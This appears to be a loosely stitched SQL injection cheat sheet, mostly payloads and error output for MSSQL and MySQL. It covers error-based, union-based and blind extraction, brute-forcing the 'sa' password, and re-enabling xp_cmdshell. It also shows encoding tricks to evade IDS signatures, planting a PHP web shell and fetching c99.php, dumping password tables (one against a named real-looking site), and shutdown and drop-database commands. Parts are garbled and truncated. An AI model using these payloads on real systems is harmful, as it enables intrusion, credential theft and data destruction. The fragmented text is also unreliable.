type of injection
this is our Error-Based, and Union-Based SQL Injections
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[j0e]' to a column of data type int.
This is another way of getting the data out of the server (such as http, or dns).
http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--
The latter case is known as "Blind SQL Injection".
Ask it if it's running as 'sa'
Determine the Injection Type : integer or string
Integer Injection:
http://[site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
String Injection:
http://[site]/page.asp?id=x' having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
Determining this is what determines if you need a ' or not.
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.
Grab the database user with USER
Grab the database name with DB_NAME
Grab the servername with @@servername
Grab the Windows/OS version with @@version
Error-Based SQL Injection Syntax for
extracting the USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--
Union-Based SQL Injection Syntax for extracting the USER
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER
D - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) )
Valid page returns after 10 second delay
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
.....and so on
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Database User = DBO
http://[site]/page.php?id=null union all select 1,user(),3,4,5/*
http://[site]/page.php?id=null union all select 1,2,database(),4,5/*
http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/*
Grab the database user with user()
Grab the database name with database()
Grab the database version with @@version
Grab the database data directory with @@datadir
Information Gathering
Error-Based SQL Injection
http://[site]/page.asp?id=2 or 1 in (select @@version)--
Obtaining the version of the OS
http://[site]/page.asp?id=2 or 1 in (select @@servername)--
Obtaining the hostname of the server
http://[site]/page.asp?id=2 or 1 in (select user)--
Obtaining the user
http://[site]/page.asp?id=2 or 1 in (select db_name(N))--
Obtaining the database name(s). N = start with 0 and keep incrementing
Basic SQLI Attack Methods
Union-Based SQL Injection
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number
of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
You should receive the error with each request, errors not shown to make room for the
Basic SQLI Attack Methods
True-False Blind SQL Injection AND 1=1-- Valid Page AND 1=2-- Error Page AND ORD(MID((VERSION()), 1, 1)) > 51 3 AND ORD(MID((VERSION()), 1, 1)) > 53 5 AND ORD(MID((VERSION()), 1, 1)) > 52 4 AND ORD(MID((VERSION()), 2, 1)) > 43 + AND ORD(MID((VERSION()), 2, 1)) > 45 - AND ORD(MID((VERSION()), 2, 1)) > 46 . AND ORD(MID((VERSION()), 3, 1)) > 51 3 AND ORD(MID((VERSION()), 3, 1)) > 49 1 AND ORD(MID((VERSION()), 3, 1)) > 48 0
MID() Extract characters from a text field
retrieved version: 5.0.45
Basic SQLI Attack Methods
Time-Based Blind SQL Injection
See if it takes 5 seconds to return the page. If it does, then you can ask it questions.
Ask it if he is running SQL Server 2000
Ask it if it's running as 'sa'
Ask it if the current user a member of the sysadmin group
Basic SQLI Attack Methods
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e14',(USER))--
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near ')'.
Hmm....ok, so it doesn't like that right paren so let's add one more to the end of our query.,(USER)))--
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'liljon' to data type int.
Now we know every injection from here on out will require the additional right paren....
@@servername()), @@version()), db_name()), etc....
UGGGGHHH.....WTF??? (1),(DB_NAME())))-
Gives the error:
Conversion failed when converting the nvarchar value 'yeaaaaaah' to data type int.,(@@VERSION)))-
Gives the error:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23
2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790:
Service Pack 2) ' to data type int.
UGGGGHHH.....WTF??? (1) Cont.
Received error: The text, ntext, or image data type cannot be selected as DISTINCT.,2,convert(text,'HELLO')--,2,convert(text,'HELLO'),4--,2,convert(text,'HELLO'),4,5--,2,convert(text,'HELLO'),4,5,6--,2,convert(text,'HELLO'),4,5,6,7--,2,convert(text,'HELLO'),4,5,6,7,8--,2,convert(text,'HELLO'),4,5,6,7,8,9--
Received error: Operand type clash: text is incompatible with int,2,convert(text,'HELLO'),4,5,6,7,8,null--
1. Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records
with distinct.
2. Use NULL in UNION injections for most data type instead of trying to guess string, date, integer
UGGGGHHH.....WTF??? (2)
Step 1: Brute-Force the 'sa' password
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'JOE','waitfor
delay ''0:0:50'';select 1;');&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'joe','waitfor
delay ''0:0:50'';select 1;');&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','waitfor
delay ''0:0:50'';select 1;');&a=1
Key point to remember is that we used time-based blind sqli to enumerate the sa account
password length. This is a great aid in bruteforcing.
Privilege Escalation
Step 2: Add current user to admin group
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','exec
master..sp_addsrvrolemember ''sa'',''sysadmin'';select 1');&a=1
Key point to remember is that we used time-based blind sqli to enumerate the sa account
password length. This is a great aid in bruteforcing.
Step 3: Recreate the xp_cmdshell stored procedure
MSSQL Server 2000
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;exec master..sp_dropextendedproc ''xp_cmdshell'';')&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE
@OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0 SELECT
@result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject %0X'',
14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8'',0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy
Remember to correctly identify the backend version as this step because MS SQL 2000
handle this differently than MS SQL 2005
Privilege Escalation
Step 3: Recreate the xp_cmdshell stored procedure (What's really going on?)
select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;
DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int
EXECUTE @OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0
SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject%0X'',14,1,@OLEResult)
EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8'',0,1IF @OLEResult<>0
SELECT @result=@OLEResult IF @OLEResult<>0
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID');&a=1
Privilege Escalation
Step 3: Recreate the xp_cmdshell stored procedure
MSSQL Server 2005 (re-enabling xp_cmdshell)
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;exec master..sp_configure ''show advanced options'',1;reconfigure;exec
master..sp_configure ''xp_cmdshell'',1;reconfigure')&a=1
http://[site]/page.asp?id=1;exec master..sp_configure 'show advanced options',
1;reconfigure;exec master..sp_configure 'ole automation procedures',1;reconfigure;&a=1
Privilege Escalation
Server-side Alphanumeric Filter
http://[site]/page.asp?id=2 or 1 like 1
Here we are doing an “or true,” although this time we are using the “like”
comparison instead of the “=” sign. We can use this same technique for the other
variants such as “and 1 like 1” or “and 1 like 2”
http://[site]/page.asp?id=2 and 1 like 1
http://[site]/page.asp?id=2 and 1 like 2
Restrictive Blacklist
Bypass Techniques:
http://[site]/page.asp?id=2 or 2=2--
http://[site]/page.asp?id=2 or 1<2--
http://[site]/page.asp?id=2 or 1 like 1--
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2--
....c'mon everyone name some more
Signature 2
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt”;
flow: to_server, established; pcre: “/(and|or) 1=1 (\-\-|\/\*|\#)/i”; sid: 1; rev:2;)
Bypass Techniques:
http://[site]/page.asp?id=2 or 2=2%2D%2D
http://[site]/page.asp?id=2 or 1<2%2D%2D
http://[site]/page.asp?id=2 or 1 like 1%2D%2D
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D
....c'mon everyone name some more
Signature Negatives
- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc)
- Comments like pretty much anything else can be represented in other encoding type
(ex: (%2D%2D = --)
- It is possible to attack an sql injection vulnerability without using comments
If this signature is so easily bypassed, what is it actually good for?
Again, it's great for automated tools and kiddies
Signature Based IDS (2)
Signature 3-5
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT
statement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection UNION
statement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)
Bypass Techniques:
http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D
http://[site]/page.asp?id=2 or 2 in (select user)--
http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C
http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7--
....c'mon everyone name some more
Signature Negatives
- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as hex
Signature Based IDS (3-5)
Signature 6
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,
established; pcre:”/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i”; sid: 2; rev2
Signature 7
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,
established; pcre:”/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|
%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i”; sid: 2; rev: 3;)
At least signature 7 takes into account case sensitivity with hex encoding.
There are always other encoding types that the attacker can use...
Signature Based IDS (6-7)
What is passed to the db
http://[site]/page.asp?id=2 or 2 in (select user)--
in comments ("IDS evasion is easy just ask j0e to teach you how")
bypass filter words
/* !________ */*!ORDER%20BY*/%2013--' union select 1,unhex(hex(group_concat(m_kasutaja,0x3a,m_parool))),3,4,5,6,7,8,9,10,11,12,13,1 ?4,15 from coffea.user_table-- f,2,0x417474656d7074696e6720746f204861636b,4,5,group_concat(0x3c62723e3c62723e,user_name,0x3c62723e3c62723e,user_email,0x3c62723e3c62723e,user_pass_str,0x3c62723e3c62723e,user_pass,0x3c62723e3c62723e,user_type,0x3c62723e3c62723e+separator+0x20),7,8,9,10,11+from+user,group_concat(0x4841434b454420425920544543484e4f,0x3c62723e3c62723e,login,0x3c62723e3c62723e,password),3,0x4841434b454420425920544543484e4f,5,6,7,8,0x56554c4e455241424c4520544f2053514c20494e4a454354494f4e532e2046495820495420475559532021213c62723e3c62723e203a50203c62723e425945202121,10,11,12,13+from+techniqu_techniq.tbladmin,group_concat(0x3c62723e3c62723e,username,0x3c62723e3c62723e,pwd,0x3c62723e3c62723e,email,0x3c62723e3c62723e+separator+0x3c62723e),3,4,5,6,7,8,9,10+from+users,2,3,4,5,password,name,8,9,10,11,12,13,14,15+from+admin,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
http://www.commercial.southernrailway.go...8+and+1=0+ Union Select 1 ,2,concat(table_name,0x3a,column_name),4,5,6,7+from+information_schema.columns+where+table_schema=database()--
injecting shell
.php?id=-1+union+select+1,2,3,4,5,'<?php @system($_REQUEST["cmd"]); ?>',6,7,8+INTO+DUMPFILE+'/home/username/public_html/images/shell.php'
You will need to know document root eg. /home/username/public_html and to find any writeable directory on it to inject your shell. Than you navigate to your shell and type
.php?id=-1 union select 1,2,'your shell code here',4,5,6,7,8 INTO DUMPFILE '/document/root/folder/shell.php'
Maybe you will need to HEX this 'your shell code here' and this '/document/root/folder/shell.php' or CHAR().
php?cmd=wget -O c99.php so don't need to put all path cause the c99.php file will be created in the directory where you created your cmd shell.
In most cases there is no need to have all those symbols. + or /**/ or () for space is enough.
If the value of $email is' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt, the SQL request becomes:
select passmd5 from people where email='' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt'
Resulting in the passwords of the users being written into the file pass.txt.
http://foo/web.php?table=38 - We get normal screen
http://foo/web.php?table=38/*%20s*/ - We get normal screen
http://foo/web.php?table=38/*!%20s*/ - We get a different screen because syntax error in comments - MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ - We get a different screen, MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ - We get a different screen, MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ - We get normal screen, MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ - We get normal screen, MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ - We get a different screen, MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ - We get normal screen, MySQL is below 4.0.18
Starting scan for vuln in parameter id.
1) (true and true = true)
If u see page like with parameter id=1, maybe u have vuln parameter. (true and false = false)
If u see empty page or error or redirect it says that u have vuln parameter
2)'+and+'1'='1 (true and true = true)'+and+'1'='2 (true and false = false)
3)"+and+"1"="1 (true and true = true)"+and+"1"="2 (true and false = false)
If u see empty page or error or redirect it says that u have vuln parameter
If u see empty page or error or redirect it says that u have vuln parameter
If u see empty page or error or redirect it says that u have vuln parameter
"Unknown column '1hello' in 'where clause" vuln
Vuln parameters are not only parameters like "index.php?id=1:
Code: [Select]
.asp?xxx=2 union select name from sysobjects where xtype='u'
.asp?xxx=Select name from syscolumns where id=(select id from sysobjects where
=2‘ union
select card_number from%20 bank_cards where '1'='1’
=2; shutdown
=2; drop database xxx